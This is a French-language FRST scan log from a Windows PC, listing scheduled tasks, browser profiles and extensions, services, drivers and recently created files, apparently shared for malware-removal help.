Task: {E6E11880-C652-48B3-AE7E-39E041C129FA} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [569416 2016-02-23] (Apple Inc. -> Apple Inc.)
Task: {F17728DD-1E1C-474D-B3F2-FE4D4BABEF48} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
Task: {F50F9C5A-8AB7-403A-AEC2-E4D19BF05AAA} - System32\Tasks\Microsoft\Windows\SideShow\AutoWake => {E51DFD48-AA36-4B45-BB52-E831F02E8316}
Task: {FCA2F478-93A0-4E56-BBBD-2BA63080887F} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [510912 2018-03-24] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {FFE87D94-D809-4550-9E9B-3C1429B75683} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [662464 2018-03-24] (NVIDIA Corporation -> NVIDIA Corporation)
(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)
==================== Internet (Avec liste blanche) ====================
(Si un élément est inclus dans le fichier fixlist.txt, s'il s'agit d'un élément du Registre, il sera supprimé ou restauré à la valeur par défaut.)
Winsock: Catalog5 08 C:\WINDOWS\SysWOW64\wlidNSP.dll [41984 2020-11-19] (Microsoft Windows -> Microsoft Corporation)
Winsock: Catalog5 09 C:\WINDOWS\SysWOW64\wlidNSP.dll [41984 2020-11-19] (Microsoft Windows -> Microsoft Corporation)
Winsock: Catalog5-x64 08 C:\WINDOWS\system32\wlidnsp.dll [67072 2020-11-19] (Microsoft Windows -> Microsoft Corporation)
Winsock: Catalog5-x64 09 C:\WINDOWS\system32\wlidnsp.dll [67072 2020-11-19] (Microsoft Windows -> Microsoft Corporation)
Hosts: Il y a plus d'un élément dans hosts. Voir la section Hosts de Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{46C6D42B-3CC7-4754-BEAE-8C2BF9EA2951}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{a6f7fd9a-859c-4bb6-97e6-ecfb8161fbe0}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{BBFC9A64-64E0-432B-89B7-5F2847FE927A}: [DhcpNameServer] 192.168.1.1
Edge:
=======
Edge DefaultProfile: Default
Edge Profile: C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default [2021-07-18]
Edge HomePage: Default -> qwant.com
Edge StartupUrls: Default -> "hxxps://www.google.com/","hxxps://www.google.com/","hxxp://www.google.com/"
Edge DefaultSearchURL: Default -> {bing:baseURL}search?q={searchTerms}&{bing:cvid}{google:assistedQueryStats}
Edge Extension: (GIPHY for Gmail) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\andgibkjiikabclfdkecpmdkfanpdapf [2021-07-02]
Edge Extension: (Norton Safe Web) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bdaafgjhhjkdplpffldcncdignokfkbo [2021-07-07]
Edge Extension: (Outlook) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\bjhmmnoficofgoiacjaajpkfndojknpb [2020-12-17]
Edge Extension: (Office) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\gggmmkjegpiggikcnhidnjjhmicpibll [2021-04-23]
Edge Extension: (Word) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\hikhggiobiflkdfdgdajcfklmcibbopi [2020-12-17]
Edge Extension: (Qwant) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\hnlkiofnhhoahaiimdicppgemmmomijo [2020-12-20]
Edge Extension: (Guns Wallpapers HD New Tab by freeaddon.com) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\iaijjmobdokjfemcipmdpkkedeoficgg [2020-12-20]
Edge Extension: (Norton Password Manager) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\lcccdlklhahfmobgpnilndimkankpnkg [2021-07-02]
Edge Extension: (Excel) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\leffmjdabcgaflkikcefahmlgpodjkdm [2020-12-17]
Edge Extension: (Microsoft News New Tab) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\lklfbkdigihjaaeamncibechhgalldgl [2021-02-19]
Edge Extension: (Infinite New Tab - the best Chrome startpage) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\meffljleomgifbbcffejnmhjagncfpbd [2020-12-20]
Edge Extension: (Norton Safe) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\mpnlkmlkncncpgnnkmkgoobfpnjmblnk [2021-06-20]
Edge Extension: (PowerPoint) - C:\Users\eddy99\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\opfacbhaojodjaojgocnibmklknchehf [2020-12-17]
FireFox:
========
FF DefaultProfile: ih85zco8.default
FF ProfilePath: C:\Users\eddy99\AppData\Roaming\Mozilla\Firefox\Profiles\ih85zco8.default [2021-01-01]
FF ProfilePath: C:\Users\eddy99\AppData\Roaming\Mozilla\Firefox\Profiles\1sds48oy.default-release-1626460500160 [2021-07-18]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=3.0.12 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2021-06-18] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.15 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2021-06-18] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.16 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2021-06-18] (VideoLAN -> VideoLAN)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.cpdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [Pas de fichier]
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [Pas de fichier]
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit Software\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [Pas de fichier]
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [Pas de fichier]
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [Pas de fichier]
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-11-16] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-11-16] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-09-12] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-03-24] (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation) [Fichier non signé]
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-03-24] (NVIDIA Corporation PE Sign v2016 -> NVIDIA Corporation) [Fichier non signé]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2021-06-27] (Adobe Inc. -> Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3835626661-1005971116-1630247016-1002: @updates.epicbrowser.com/Epic Privacy Browser Installer;version=3 -> C:\Users\eddy99\AppData\Local\Epic Privacy Browser\Installer\1.3.27.13\npEpicUpdate3.dll [2020-12-16] (Google Inc (TEST) -> Epic Privacy Browser) [Fichier non signé]
FF Plugin HKU\S-1-5-21-3835626661-1005971116-1630247016-1002: @updates.epicbrowser.com/Epic Privacy Browser Installer;version=9 -> C:\Users\eddy99\AppData\Local\Epic Privacy Browser\Installer\1.3.27.13\npEpicUpdate3.dll [2020-12-16] (Google Inc (TEST) -> Epic Privacy Browser) [Fichier non signé]
Chrome:
=======
CHR Profile: C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default [2021-07-18]
CHR Notifications: Default -> hxxps://forums.futura-sciences.com; hxxps://www.futura-sciences.com
CHR HomePage: Default -> qwant.com
CHR StartupUrls: Default -> "hxxps://www.google.com/","hxxps://www.google.com/","hxxp://www.google.com/"
CHR DefaultSearchURL: Default -> hxxps://www.qwant.com/?q={searchTerms}&client=ext-chrome-sb
CHR DefaultSearchKeyword: Default -> www.qwant.com
CHR DefaultSuggestURL: Default -> hxxps://api.qwant.com/api/suggest/?q={searchTerms}&client=opensearch&lang=fr_fr
CHR Extension: (Slides) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2021-06-01]
CHR Extension: (Safe Torrent Scanner) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\aegnopegbbhjeeiganiajffnalhlkkjb [2021-07-18]
CHR Extension: (GIPHY for Gmail) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\andgibkjiikabclfdkecpmdkfanpdapf [2021-07-01]
CHR Extension: (Docs) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2021-06-01]
CHR Extension: (Google Drive) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2021-06-01]
CHR Extension: (YouTube) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2021-06-01]
CHR Extension: (Black green shards) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\cojkleigdijnbfecdhjigpgalhfhkdee [2021-05-13]
CHR Extension: (Sheets) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2021-06-01]
CHR Extension: (Norton Safe Web) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnpbeacklnhmkkilekogeiekaglbmmka [2021-06-26]
CHR Extension: (Google Docs hors connexion) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-06-26]
CHR Extension: (Qwant) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\hnlkiofnhhoahaiimdicppgemmmomijo [2020-12-19]
CHR Extension: (Guns Wallpapers HD New Tab by freeaddon.com) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\iaijjmobdokjfemcipmdpkkedeoficgg [2021-05-13]
CHR Extension: (Microsoft News New Tab) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\lklfbkdigihjaaeamncibechhgalldgl [2021-07-18]
CHR Extension: (PowerPoint Online) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdafamggmaaaginooondinjgkgcbpnhp [2020-12-16]
CHR Extension: (Infinite New Tab - the best Chrome startpage) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\meffljleomgifbbcffejnmhjagncfpbd [2021-05-13]
CHR Extension: (Web Safety) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\mfhcmdonhekjhfbjmeacdjbhlfgpjabp [2021-07-18]
CHR Extension: (Norton Safe) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\mpnlkmlkncncpgnnkmkgoobfpnjmblnk [2021-06-16]
CHR Extension: (Office) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndjpnladcallmjemlbaebfadecfhkepb [2021-04-19]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-01-29]
CHR Extension: (Gmail) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2021-06-01]
CHR Extension: (Chrome Media Router) - C:\Users\eddy99\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2021-06-04]
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
CHR HKLM-x32\...\Chrome\Extension: [mfhcmdonhekjhfbjmeacdjbhlfgpjabp]
==================== Services (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [169672 2021-01-26] (Adobe Inc. -> Adobe Inc.)
R3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [266240 2012-06-05] (Brother Industries, Ltd.) [Fichier non signé]
R2 CyberLink PowerDVD 10 MS Service; C:\Program Files (x86)\CyberLink\PowerDVD10\Device\MediaServer\CLMSServer.exe [312616 2011-04-13] (CyberLink -> CyberLink)
R2 NortonSecurity; C:\Program Files\Norton Security\Engine\22.21.5.44\NortonSecurity.exe [343336 2021-05-31] (NortonLifeLock Inc. -> Broadcom)
R2 nsWscSvc; C:\Program Files\Norton Security\Engine\22.21.5.44\nsWscSvc.exe [1055048 2021-05-31] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
R2 PDFProFiltSrvPP; C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe [145256 2011-08-02] (Nuance Communications, Inc. -> Nuance Communications, Inc.)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [3004048 2019-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103384 2019-12-07] (Microsoft Windows Publisher -> Microsoft Corporation)
S2 CyberLink PowerDVD 10 MS Monitor Service; "C:\Program Files (x86)\CyberLink\PowerDVD10\Device\MediaServer\CLMSMonitorService.exe" [X]
S2 IAStorDataMgrSvc; "C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe" [X]
S2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [X]
R2 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugin"
S2 VPNUnlimitedService; "C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe" [X]
===================== Pilotes (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
R1 amsdk; C:\WINDOWS\system32\drivers\amsdk.sys [232792 2021-04-09] (Zemana D.O.O. Sarajevo -> Copyright 2018.)
S3 AppleLowerFilter; C:\WINDOWS\System32\drivers\AppleLowerFilter.sys [35976 2020-10-09] (WDKTestCert build,132303256403278908 -> Apple Inc.)
R1 BHDrvx64; C:\Program Files\Norton Security\NortonData\22.20.5.39\Definitions\BASHDefs\20210714.013\BHDrvx64.sys [1995864 2021-03-16] (Symantec Corporation -> Broadcom)
R1 ccSet_NGC; C:\WINDOWS\System32\drivers\NGCx64\1615050.02C\ccSetx64.sys [192248 2021-05-31] (Symantec Corporation -> Symantec Corporation)
R1 CLVirtualDrive; C:\WINDOWS\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink -> CyberLink)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [516168 2021-02-02] (Symantec Corporation -> Broadcom)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [153672 2021-02-10] (Symantec Corporation -> Broadcom)
S3 FXVAD; C:\WINDOWS\system32\drivers\fxvad.sys [326656 2021-06-29] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
R1 IDSVia64; C:\Program Files\Norton Security\NortonData\22.20.5.39\Definitions\IPSDefs\20210716.061\IDSvia64.sys [1488976 2021-04-06] (Symantec Corporation -> Broadcom)
R3 int0800; C:\WINDOWS\System32\drivers\flashud.sys [62984 2019-08-21] (Intel Corporation -> Intel Corporation)
S3 nsvst_NGC; C:\WINDOWS\System32\drivers\NGCx64\1615050.02C\nsvst.sys [54848 2021-05-31] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
S3 RtlWlanu; C:\WINDOWS\System32\drivers\rtwlanu.sys [4776176 2017-12-20] (Realtek Semiconductor Corp -> Realtek Semiconductor Corporation)
R1 SRTSP; C:\WINDOWS\System32\drivers\NGCx64\1615050.02C\SRTSP64.SYS [890464 2021-05-31] (Symantec Corporation -> Broadcom)
R1 SRTSPX; C:\WINDOWS\System32\drivers\NGCx64\1615050.02C\SRTSPX64.SYS [50272 2021-05-31] (Symantec Corporation -> Broadcom)
R0 SymEFASI; C:\WINDOWS\System32\drivers\NGCx64\1615050.02C\SYMEFASI64.SYS [2062424 2021-05-31] (Symantec Corporation -> Broadcom)
S0 SymELAM; C:\WINDOWS\System32\drivers\NGCx64\1615050.02C\SymELAM.sys [25080 2021-05-31] (Microsoft Windows Early Launch Anti-malware Publisher -> Broadcom Corporation)
R3 SymEvent; C:\windows\system32\Drivers\SYMEVENT64x86.SYS [99912 2020-12-15] (Symantec Corporation -> Symantec Corporation)
R3 SymEvnt; C:\Program Files\Norton Security\NortonData\22.20.5.39\SymPlatform\SymEvnt.sys [712424 2020-07-21] (Symantec Corporation -> Symantec Corporation)
R1 SymIRON; C:\WINDOWS\System32\drivers\NGCx64\1615050.02C\Ironx64.SYS [316488 2021-05-31] (Symantec Corporation -> Symantec Corporation)
R1 SymNetS; C:\WINDOWS\System32\drivers\NGCx64\1615050.02C\symnets.sys [575328 2021-05-31] (Symantec Corporation -> Symantec Corporation)
R3 tap0901; C:\WINDOWS\System32\drivers\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 tapprotonvpn; C:\WINDOWS\System32\drivers\tapprotonvpn.sys [49008 2020-04-06] (Microsoft Windows Hardware Compatibility Publisher -> The OpenVPN Project)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [46688 2019-12-07] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [350136 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [54200 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
S3 WNDA3100v3; C:\WINDOWS\system32\DRIVERS\WNDA3100v3.sys [2259016 2018-03-05] (NETGEAR TAIWAN CO., LTD -> MediaTek Inc.)
S3 wpCtrlDrv_NGC; C:\WINDOWS\System32\drivers\NGCx64\1615050.02C\wpCtrlDrv.sys [1013792 2021-05-31] (NortonLifeLock Inc. -> NortonLifeLock Inc.)
==================== NetSvcs (Avec liste blanche) ===================
(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)
==================== Un mois (créés) (Avec liste blanche) =========
(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)
2021-07-18 14:16 - 2021-07-18 14:17 - 000000000 ____D C:\FRST
2021-07-18 14:06 - 2021-07-18 14:06 - 000001397 _____ C:\DelFix.txt
2021-07-18 13:20 - 2021-07-18 13:20 - 000000000 ____D C:\WINDOWS\system32\Tasks\Remediation
2021-07-18 12:07 - 2021-07-18 12:07 - 000001263 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pixillion - Convertisseur d'images.lnk
2021-07-18 12:07 - 2021-07-18 12:07 - 000000000 ____D C:\Users\eddy99\Suite NCH Software
2021-07-18 11:37 - 2021-07-18 11:37 - 001066873 _____ C:\Users\eddy99\Downloads\carte-reseau-infrabel-FR.pdf
2021-07-18 11:14 - 2021-07-18 11:14 - 000000000 ____D C:\WINDOWS\Panther
2021-07-17 18:12 - 2021-07-17 18:12 - 014767048 _____ (Intel Corporation) C:\Users\eddy99\Downloads\SetupRST.exe
2021-07-17 18:12 - 2021-07-17 18:12 - 000000000 ____D C:\Users\eddy99\Intel
2021-07-17 15:17 - 2021-07-17 15:17 - 000255928 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\27517114.sys
2021-07-17 08:35 - 2021-07-17 08:37 - 000000000 ____D C:\Users\eddy99\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Corporation
2021-07-17 08:35 - 2021-07-17 08:35 - 000000000 ____D C:\Users\eddy99\AppData\Local\SaRALogs
2021-07-17 08:33 - 2021-07-17 11:59 - 000000000 ____D C:\Users\eddy99\AppData\Local\Deployment
2021-07-17 08:33 - 2021-07-17 08:33 - 000000000 ____D C:\Users\eddy99\AppData\Local\Apps\2.0
2021-07-16 20:39 - 2021-07-18 11:06 - 000000000 ____D C:\Users\eddy99\AppData\Local\vback
2021-07-16 20:39 - 2021-07-16 20:39 - 000002396 _____ C:\Users\eddy99\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maxthon.lnk
2021-07-16 20:39 - 2021-07-16 20:39 - 000000000 ____D C:\Users\eddy99\AppData\Roaming\VBox
2021-07-16 20:38 - 2021-07-16 20:39 - 000000000 ____D C:\Users\eddy99\AppData\Local\Maxthon
2021-07-16 20:00 - 2021-07-17 08:19 - 000000000 ____D C:\Program Files\Mozilla Firefox
2021-07-16 17:34 - 2021-07-16 17:34 - 064650240 _____ (The Chromium Authors) C:\Users\eddy99\Downloads\chromium_93-0-4578_en_432989_32.exe
2021-07-16 13:44 - 2021-07-16 13:44 - 000386829 _____ C:\Users\eddy99\Downloads\CCF_000026.pdf
2021-07-16 13:44 - 2021-07-16 13:44 - 000383333 _____ C:\Users\eddy99\Downloads\CCF_000025.pdf
2021-07-16 08:20 - 2021-07-18 14:14 - 000000000 ____D C:\Users\eddy99\AppData\LocalLow\uTorrent
2021-07-15 12:55 - 2021-07-15 12:55 - 000011357 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-07-15 12:55 - 2021-07-15 12:55 - 000007680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MsraLegacy.tlb
2021-07-15 12:55 - 2021-07-15 12:55 - 000007680 _____ (Microsoft Corporation) C:\WINDOWS\system32\MsraLegacy.tlb
2021-07-15 12:55 - 2021-07-15 12:55 - 000006656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rendezvousSession.tlb
2021-07-15 12:55 - 2021-07-15 12:55 - 000006656 _____ (Microsoft Corporation) C:\WINDOWS\system32\rendezvousSession.tlb
2021-07-15 12:54 - 2021-07-15 12:54 - 001823280 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2021-07-14 23:23 - 2021-07-15 14:28 - 000000000 ____D C:\Program Files (x86)\BraveSoftware
2021-07-14 23:23 - 2021-07-15 14:06 - 000000000 ____D C:\Users\eddy99\AppData\Local\BraveSoftware
2021-07-11 22:14 - 2021-07-11 22:14 - 000000000 ____D C:\Users\eddy99\Downloads\Hitman-Pro-3823318-Crack---Product-Key-Full-Download-2021
2021-07-11 22:13 - 2021-07-11 22:13 - 001570966 _____ C:\Users\eddy99\Downloads\60eb50_Hitman-Pro-3823.zip
2021-07-11 22:01 - 2021-07-11 22:28 - 000000000 ____D C:\ProgramData\HitmanPro.Alert
2021-07-11 22:01 - 2021-07-11 22:28 - 000000000 ____D C:\ProgramData\HitmanPro
2021-07-06 12:17 - 2021-07-06 12:17 - 000218027 _____ C:\Users\eddy99\Downloads\{70E67A7A-0000-C449-89A8-F8EA89B36791}.pdf
2021-07-05 13:22 - 2021-07-05 13:22 - 000255928 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\11350E4B.sys
2021-07-05 10:00 - 2021-07-05 10:00 - 000000000 ____D C:\ProgramData\FxSound LLC
2021-07-04 14:59 - 2021-07-04 14:59 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\qBittorrent
2021-07-04 14:58 - 2021-07-04 14:59 - 000000000 ____D C:\Program Files (x86)\qBittorrent
2021-07-04 14:55 - 2021-07-04 14:55 - 000000000 ____H C:\ProgramData\DP45977C.lfl
2021-07-04 14:55 - 2021-07-04 14:55 - 000000000 ____D C:\WINDOWS\system32\DAX3
2021-07-04 14:55 - 2021-07-04 14:55 - 000000000 ____D C:\WINDOWS\system32\DAX2
2021-07-04 14:55 - 2021-07-04 14:55 - 000000000 ____D C:\ProgramData\Audyssey Labs
2021-07-02 23:11 - 2021-07-02 23:11 - 000000000 ____D C:\Program Files\FxSound LLC
2021-06-30 20:14 - 2021-06-30 20:16 - 000000000 ____D C:\Users\eddy99\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\TP-Link
2021-06-30 20:14 - 2021-06-30 20:16 - 000000000 ____D C:\Program Files (x86)\TP-Link
2021-06-30 20:13 - 2017-12-20 00:53 - 004776176 _____ (Realtek Semiconductor Corporation ) C:\WINDOWS\system32\rtwlanu.sys
2021-06-30 20:13 - 2017-12-20 00:53 - 004776176 _____ (Realtek Semiconductor Corporation ) C:\WINDOWS\system32\Drivers\rtwlanu.sys
2021-06-30 20:13 - 2017-12-20 00:53 - 000018545 _____ C:\WINDOWS\system32\netrtwlanu.cat
2021-06-30 15:53 - 2021-07-18 14:14 - 000000000 ____D C:\Program Files\CCleaner
2021-06-30 15:53 - 2021-07-01 18:53 - 000004210 _____ C:\WINDOWS\system32\Tasks\CCleaner Update
2021-06-30 15:53 - 2021-06-30 15:53 - 000002874 _____ C:\WINDOWS\system32\Tasks\CCleanerSkipUAC
2021-06-30 15:53 - 2021-06-30 15:53 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2021-06-29 07:16 - 2021-06-29 07:16 - 000326656 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\system32\Drivers\fxvad.sys
2021-06-26 20:37 - 2021-06-26 20:37 - 000016402 _____ C:\Users\eddy99\Downloads\CCleaner Pro Portable 5.82.8950 (Windows).torrent
2021-06-25 23:28 - 2021-06-25 23:28 - 000000000 ____D C:\Users\eddy99\Downloads\TL-WN823N(EUUS)_V3_181024_Win
2021-06-25 23:24 - 2018-11-07 04:51 - 000000000 ____D C:\Users\eddy99\Downloads\plugins
2021-06-25 23:24 - 2018-03-20 10:09 - 000001306 ____N C:\Users\eddy99\Downloads\readme.txt
2021-06-25 23:24 - 2018-01-30 09:46 - 043482128 ____R C:\Users\eddy99\Downloads\Setup.exe
2021-06-25 23:23 - 2021-06-25 23:24 - 044139521 _____ C:\Users\eddy99\Downloads\TL-WN823N(EUUS)_V3_181024_Win.zip
2021-06-23 22:06 - 2021-06-23 22:06 - 001624440 _____ (Tous Les Drivers) C:\Users\eddy99\Downloads\Mes_Drivers_3.0.4 (1).exe
2021-06-23 14:32 - 2021-06-23 14:32 - 000000000 ____D C:\Users\eddy99\AppData\Roaming\de.devolo.dLAN.Cockpit
2021-06-22 14:34 - 2021-06-22 14:34 - 002371072 _____ C:\WINDOWS\system32\rdpnano.dll
2021-06-22 14:34 - 2021-06-22 14:34 - 001393504 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2021-06-22 14:34 - 2021-06-22 14:34 - 001314128 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2021-06-22 14:34 - 2021-06-22 14:34 - 000570880 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
